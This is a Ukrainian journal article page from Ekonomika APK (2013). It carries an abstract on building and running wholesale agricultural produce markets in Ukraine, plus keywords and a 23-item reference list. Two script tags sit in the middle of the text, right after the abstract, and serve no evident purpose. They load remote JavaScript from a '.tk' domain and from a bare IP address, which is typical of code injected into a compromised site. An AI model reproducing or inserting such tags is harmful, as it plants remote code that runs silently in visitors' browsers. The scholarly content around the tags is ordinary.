ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.439.5:339.187.4
Аграрний ринок

Розбудова та функціонування оптових ринків сільськогосподарської продукції в Україні / Грецька Н. А. // Економіка АПК. - 2013. - № 11 - С. 50

Досліджено стан процесу розбудови оптових ринків сільськогосподарської продукції (ОРСП) в Україні. Проекти з будівництва ОРСП фінансуються виключно з двох джерел: приватний капітал та кошти державного бюджету. Прямі іноземні інвестиції та допомогу Європейського Союзу не вдалося залучити на даному етапі будівництва ОРСП. В процесі дослідження виявлено особливості, які гальмують розвиток ОРСП: недосконалість законодавчої бази, нестача фінансових ресурсів, висока вартість залучення кредитних ресурсів, тривалий термін окупності проекту, низький рівень розвитку кооперативного руху в країні, недостатня кількість оптових покупців на ОРСП та інші. Порівняно вітчизняний і зарубіжний досвід функціонування ОРСП, запропоновано перелік заходів, покликаних підвищити ефективність процесу розбудови та функціонування їх в Україні. Надано рекомендації щодо удосконалення законодавчого поля, поглиблення державного регулювання діяльності ОРСП, а саме - постійного представництва органів виконавчої влади на ОРСП, систематичного моніторингу їхньої діяльності та інші. Табл.: 1. Бібліогр.: 23.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: інфраструктура аграрного ринку, канали реалізації сільськогосподарської продукції, оптова торгівля, оптовий ринок сільськогосподарської продукції (ОРСП), господарства населення, державне регулювання

Список використаних джерел

 1. Гоцуленко Е. Несостоявшаяся стабильность. Почему отечественные бренды витаминной продукции пребывают в плену у перекупщиков? / Е. Гоцуленко, Н. Гоцуленко // Зеркало недели. – 2013. – № 18 (115). – 25 мая. – С. 10.
 2. Горбонос Ф. В. Організаційно-функціональна модель оптового ринку сільськогосподарської продукції на локальному рівні / Ф. В. Горбонос, Н.Ф. Павленчик, А. О. Павленчик, І. О. Корчинський // Економіка АПК. – 2009. – № 7. – С. 108-120.
 3. Кашуба Ю.П. Регіональні оптові ринки сільськогосподарської продукції. / Ю. П. Кашуба, Я.С. Янишин // Економіка АПК. – 2012 – № 2. – С. 57-61.
 4. Копитець Н. Г. Особливості функціонування оптових продовольчих ринків у зарубіжних країнах / Н. Г. Копитець // Наук. вісн. НАУ. – 2007. – Випуск 110. Частина 1. – С. 130-134.
 5. Корінець Р. Я. Про діяльність асоціації оптових ринків сільськогосподарської продукції / Р. Я. Корінець // Економіка АПК. – 2011. – № 9. – С. 75 - 81.
 6. Лисюк В. М. Стратегія розвитку оптових ринків сільськогосподарської продукції в Україні / В. М. Лисюк // Економічні інновації. – 2011. – Вип. 43. – С. 151-159.
 7. Стройко Т. В. Розвиток оптових ринків сільськогосподарської продукції як елементу гарантування продовольчої безпеки / Т. В. Стройко // Економіка АПК. – 2012. – № 12. – С. 43-48.
 8. Шубравська О.В. Оптові ринки сільськогосподарської продукції: європейський досвід та українські перспективи / О. В. Шубравська, Н. А. Ринденко // Економіка України. – 2012. – № 8. – С. 77-85.
 9. Про надання юридичній особі статусу оптового ринку сільськогосподарської продукції в Миколаївській області. Наказ Міністерства аграрної політики та продовольства України від 2 квіт. 2012 року № 159 [Електронний ресурс] // Профессиональная нормативно-правовая библиотека “НОРМАТИВ™ PRO”. – Режим доступу: http://document.ua/pro-nadannja-yuridichnii-osobi-statusu-optovogo-rinku-silsko-doc110166.html.
 10. Федоров Н. В Николаеве появится крупнейший в Украине оптовый рынок сельхозпродукции [Електронний ресурс] / Н. Федоров // Николаевская областная интернет-газета. Новости-Н. – Режим доступу: http://novosti-n.mk.ua/news/read/40292.html.
 11. Малиновский Б. От строительства – к интенсивному развитию / Б. Малиновский // Овощеводство – 2(98) февр. 2013. – С. 20-21.
 12. Ринденко Н. А. Державна підтримка формування маркетингової інфраструктури агарного ринку // Інноваційні трансформації аграрного сектору економіки: моногр. / [О.В. Шубравська, Л.В. Молдаван, Б.Й. Пасхавер та ін.]; за ред. д-ра екон. наук О.В. Шубравської. – К.: Ін-т екон. та прогнозув. НАНУ, 2012. – С. 375 – 388.
 13. Андрюшко А. Про гуртові ринки [Електронний ресурс] / А. Андрюшко – Режим доступу до сайту: http://www.docme.ru/doc/121792/pro-gurtov%D1%96-rinki.
 14. Мельник І.О. Вивчення досвіду функціонування оптових ринків сільськогосподарської продукції в Польщі як ефективного діючого елемента ринкової інфраструктури / І.О. Мельник, О. В. Колійчук // Агросвіт. – 2012. – №1. – С. 37-41.
 15. Порядок використання коштів, передбачених у державному бюджеті для надання фінансової підтримки для створення оптових ринків сільськогосподарської продукції. Постанова Кабінету Міністрів України від 29 верес. 2010 р. № 893 [Електронний ресурс] // Верховна Рада України. Офіц. веб-портал. – Режим доступу: http://zakon.rada.gov.ua/cgi-bin/laws/main.cgi?nreg=893-2010-%EF&p=1304260707868595.
 16. Вернигора М. Микола Гриценко: Насправді оптових ринків в Україні немає [Електронний ресурс] / М. Вернигора // Українське слово. Інтеренет – видання. – Режим доступу до сайту: http://ukrslovo.org.ua/ukrayina/ekonomika/mykola-grytsenko-naspravdi-optovych-rynkiv-v-ukrayini-nemaye.html.
 17. Про безпечність та якість харчових продуктів: Закон України від 23 груд. 1997 року №771/97-ВР (зі змінами та доповненнями) [Електронний ресурс] // Верховна Рада України. Офіц. веб-портал. – Режим доступу: http://zakon1.rada.gov.ua/laws/show/771/97-%D0%B2%D1%80/print1360758760075501.
 18. Молдаван Л. В. Українського села не буде, якщо не буде сільської кооперації [Електронний ресурс] / Л.В. Молдаван // Зерно.org.ua. – Режим доступу: http://www.zerno.org.ua/articles/coop/257.
 19. Densley B. Wholesale market management. A manual [Electronic resource] / B. Densley, E. Sanchez-Monjo // FAO Agricultural services bulleten. – 1999. – № 90 / Mode of access: http://books.google.com.ua/books?id=EPDQWephIzMC&printsec=frontcover&hl=ru&source=gbs_ge_summary_r&cad=0#v=onepage&q&f=false.
 20. Mittendorf H. J. Planning of urban wholesale markets for perishable food with particular reference to developing countries / Hans Joachim Mittendorf. – Rome.: FAO, 1976. –184 p.
 21. Seidler E. Wholesale Market Development – FAO’s Experience [Electronic resource] / E. Seidler// Paper prepared for the 22nd Congress of the World Union of Wholesale Markets. September 2001. – South Africa. – Rome: FAO. Mode of access: www.fao.org www.fao.org/ag/magazine/markets.pdf‎.
 22. Tollens E. Wholesale Markets in African Cities. Diagnosis, Role, Advantages, and Elements for Further Study and Development [Electronic resource] / E. Tollens // FAO Food Supply and Distribution to Cities in French-Speaking Africa. Food into cities collection. : University of Louvain, 1997. – April. – 26 p. Mode of access: http://www.fao.org/docrep/003/ab790e/ab790e00.htm#Contents.
 23. Tracey-White J. D. Wholesale markets. Planning and design manual. [Electronic resource] / Tracey-White J. D. // FAO Agricultural services bulleten. – 1991. – № 90. Mode of access: http://www.fao.org/docrep/t0521e/t0521e00.htm.
Читати статтю: 13_11_50-56.pdf